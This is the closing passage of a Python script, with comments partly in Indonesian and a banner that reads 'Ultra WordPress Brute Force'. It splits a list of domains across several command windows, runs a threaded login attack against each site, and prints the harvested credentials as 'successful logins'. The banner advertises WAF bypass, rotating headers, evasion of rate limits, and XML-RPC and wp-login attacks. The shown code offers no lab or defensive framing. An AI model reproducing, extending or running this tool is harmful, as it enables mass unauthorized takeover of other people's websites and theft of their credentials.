"""Split file menjadi beberapa parts"""
print(f"{Fore.CYAN}[SPLITTING]{Style.RESET_ALL} Splitting {self.input_file} into {self.num_parts} parts...")
# Read all lines
with open(self.input_file, 'r', encoding='utf-8', errors='ignore') as f:
lines = [line.strip() for line in f if line.strip()]
total_lines = len(lines)
lines_per_part = total_lines // self.num_parts
# Create parts
for i in range(self.num_parts):
start_idx = i * lines_per_part
end_idx = start_idx + lines_per_part if i < self.num_parts - 1 else total_lines
part_lines = lines[start_idx:end_idx]
part_file = f"{self.input_file}_part{i+1}.txt"
with open(part_file, 'w', encoding='utf-8') as f:
f.write('\n'.join(part_lines))
self.part_files.append(part_file)
print(f"{Fore.GREEN}[PART {i+1}]{Style.RESET_ALL} {len(part_lines)} lines -> {part_file}")
return self.part_files
def launch_cmds(self):
"""Launch multiple CMD windows"""
print(f"{Fore.CYAN}[LAUNCHING]{Style.RESET_ALL} Launching {self.num_parts} CMD windows...")
script_path = os.path.abspath(__file__)
for i, part_file in enumerate(self.part_files):
cmd_command = f'start cmd /k python "{script_path}" --part {i+1} --file "{part_file}"'
if os.name == 'nt': # Windows
subprocess.Popen(cmd_command, shell=True)
time.sleep(1) # Delay between launches
else:
# For Linux/Mac, use terminal emulator
term_cmd = f'gnome-terminal -- python3 "{script_path}" --part {i+1} --file "{part_file}"'
subprocess.Popen(term_cmd, shell=True)
print(f"{Fore.GREEN}[DONE]{Style.RESET_ALL} Launched {self.num_parts} windows")
return True
# ==============================================================================
# MAIN EXECUTION WITH MULTI-CMD SUPPORT
# ==============================================================================
def run_single_thread(part_file, thread_id):
"""Run attack untuk single thread/part"""
attack = ProWordPressAttackEnhanced(thread_id=thread_id, part_file=part_file)
# Read domains
with open(part_file, 'r', encoding='utf-8', errors='ignore') as f:
domains = [line.strip() for line in f if line.strip()]
print(f"{Fore.CYAN}[THREAD-{thread_id}]{Style.RESET_ALL} Processing {len(domains)} domains from {part_file}")
# Process each domain
for domain in domains:
try:
result = attack.attack_site(domain)
if result:
print(f"{Fore.GREEN}[HIT]{Style.RESET_ALL} Thread-{thread_id}: {result['url']}")
except KeyboardInterrupt:
print(f"\n{Fore.YELLOW}[INTERRUPTED]{Style.RESET_ALL} Thread-{thread_id} stopped")
break
except Exception as e:
print(f"{Fore.RED}[ERROR]{Style.RESET_ALL} Thread-{thread_id}: {str(e)}")
continue
def main():
"""Main function dengan multi-CMD support"""
banner = f"""{Fore.CYAN}
╔══════════════════════════════════════════════════════════════════════════╗
║ ULTRA WORDPRESS BRUTE FORCE - MULTI-CMD EDITION ║
║ WAF Bypass • Auto Split • 20 Methods • Ultra Fast ║
║ Zero False Positive • Multi-Threading ║
╚══════════════════════════════════════════════════════════════════════════╝{Style.RESET_ALL}
{Fore.YELLOW}FEATURES:{Style.RESET_ALL}
• Auto Split File untuk Multi-CMD
• 20+ Password Generation Methods
• WAF/BLOCK Bypass dengan Rotating Headers
• Zero False Positive Validation
• XML-RPC & WP-Login Support
• Real Username Harvesting
• Smart Rate Limiting Avoidance
• Thread-Specific Results Saving
"""
print(banner)
# Check for command line arguments
if len(sys.argv) > 1:
# Running in part mode
part_id = 1
part_file = None
for i in range(1, len(sys.argv)):
if sys.argv[i] == '--part' and i+1 < len(sys.argv):
part_id = int(sys.argv[i+1])
elif sys.argv[i] == '--file' and i+1 < len(sys.argv):
part_file = sys.argv[i+1]
if part_file and os.path.exists(part_file):
print(f"{Fore.GREEN}[PART MODE]{Style.RESET_ALL} Running part {part_id} with file {part_file}")
run_single_thread(part_file, part_id)
else:
print(f"{Fore.RED}[ERROR]{Style.RESET_ALL} Invalid part file")
input("\nPress Enter to exit...")
return
# Normal mode
list_file = input(f"\n{Fore.CYAN}[INPUT]{Style.RESET_ALL} Domain list file: ").strip() or "domains.txt"
if not os.path.exists(list_file):
print(f"{Fore.RED}[ERROR]{Style.RESET_ALL} File not found!")
return
# Ask for mode
print(f"\n{Fore.CYAN}[MODE SELECTION]{Style.RESET_ALL}")
print("1. Single CMD Mode (Normal)")
print("2. Multi-CMD Mode (Split file & launch multiple CMD)")
mode = input(f"{Fore.CYAN}[CHOICE]{Style.RESET_ALL} Select mode (1/2): ").strip()
if mode == "2":
# Multi-CMD Mode
num_parts = input(f"{Fore.CYAN}[PARTS]{Style.RESET_ALL} Number of CMD windows (2-8): ").strip()
try:
num_parts = int(num_parts)
num_parts = max(2, min(num_parts, 8))
except:
num_parts = 4
# Split and launch
launcher = MultiCmdLauncher(list_file, num_parts)
part_files = launcher.split_file()
confirm = input(f"\n{Fore.YELLOW}[CONFIRM]{Style.RESET_ALL} Launch {num_parts} CMD windows? (y/n): ").strip().lower()
if confirm == 'y':
launcher.launch_cmds()
print(f"\n{Fore.GREEN}[INFO]{Style.RESET_ALL} Each window will save results to its own file (results_partX.txt)")
else:
print(f"{Fore.YELLOW}[CANCELLED]{Style.RESET_ALL}")
return
else:
# Single CMD Mode
try:
threads = int(input(f"{Fore.CYAN}[THREADS]{Style.RESET_ALL} Threads (1-50): ").strip() or "20")
threads = max(1, min(threads, 50))
except:
threads = 20
# Read domains
with open(list_file, 'r', encoding='utf-8', errors='ignore') as f:
domains = [line.strip() for line in f if line.strip()]
print(f"\n{Fore.GREEN}[INFO]{Style.RESET_ALL} Loaded {len(domains)} domains")
print(f"{Fore.GREEN}[INFO]{Style.RESET_ALL} Using {threads} threads")
input(f"\n{Fore.YELLOW}[PRESS ENTER TO START]{Style.RESET_ALL}")
os.system('cls' if os.name == 'nt' else 'clear')
print(banner)
# Statistics
total = len(domains)
processed = 0
success = 0
start = time.time()
# Create attack instance
attack = ProWordPressAttackEnhanced()
# Process dengan thread pool
print(f"{Fore.CYAN}[STATUS]{Style.RESET_ALL} Starting attack with {threads} threads...")
with concurrent.futures.ThreadPoolExecutor(max_workers=threads) as executor:
futures = []
for domain in domains:
futures.append(executor.submit(attack.attack_site, domain))
for future in concurrent.futures.as_completed(futures):
processed += 1
try:
result = future.result()
if result:
success += 1
# Progress
elapsed = time.time() - start
if elapsed > 0:
speed = processed / elapsed
eta = ((elapsed / processed) * (total - processed)) if processed > 0 else 0
sys.stdout.write(f"\r{Fore.CYAN}[PROGRESS]{Style.RESET_ALL} {processed}/{total} | "
f"Success: {success} | "
f"Speed: {speed:.2f}/s | "
f"ETA: {eta/60:.1f}m")
sys.stdout.flush()
except KeyboardInterrupt:
print(f"\n{Fore.YELLOW}[INTERRUPTED]{Style.RESET_ALL}")
break
except:
continue
# Final summary
elapsed_total = time.time() - start
print(f"\n\n{Fore.CYAN}{'='*70}{Style.RESET_ALL}")
print(f"{Fore.GREEN}[SCAN COMPLETED]{Style.RESET_ALL}")
print(f"{Fore.CYAN}{'='*70}{Style.RESET_ALL}")
print(f"{Fore.YELLOW}Domains Processed : {processed}/{total}{Style.RESET_ALL}")
print(f"{Fore.GREEN}Success Found : {success}{Style.RESET_ALL}")
if processed > 0:
success_rate = (success / processed) * 100
print(f"{Fore.YELLOW}Success Rate : {success_rate:.1f}%{Style.RESET_ALL}")
print(f"{Fore.CYAN}Total Time : {elapsed_total/60:.1f} minutes{Style.RESET_ALL}")
print(f"{Fore.YELLOW}Speed : {processed/elapsed_total:.2f} domains/second{Style.RESET_ALL}")
if os.path.exists("results.txt"):
with open("results.txt", 'r', encoding='utf-8') as f:
hits = f.readlines()
if hits:
print(f"\n{Fore.CYAN}[SUCCESSFUL LOGINS]{Style.RESET_ALL}")
for hit in hits[:10]: # Show first 10
parts = hit.strip().split('|')
if len(parts) >= 3:
print(f"{Fore.GREEN}• {parts[0]} | {parts[1]}:{parts[2]}{Style.RESET_ALL}")
if len(hits) > 10:
print(f"{Fore.YELLOW}... and {len(hits)-10} more{Style.RESET_ALL}")
print(f"\n{Fore.GREEN}Results saved to:{Style.RESET_ALL}")
print(f"{Fore.CYAN}• results.txt{Style.RESET_ALL}")
print(f"{Fore.CYAN}{'='*70}{Style.RESET_ALL}")
if __name__ == "__main__":
try:
main()
except KeyboardInterrupt:
print(f"\n\n{Fore.YELLOW}[INTERRUPTED]{Style.RESET_ALL} Script stopped")
except Exception as e:
print(f"\n{Fore.RED}[CRITICAL ERROR]{Style.RESET_ALL} {str(e)}")
import traceback
traceback.print_exc()
PYTHON
53,005 characters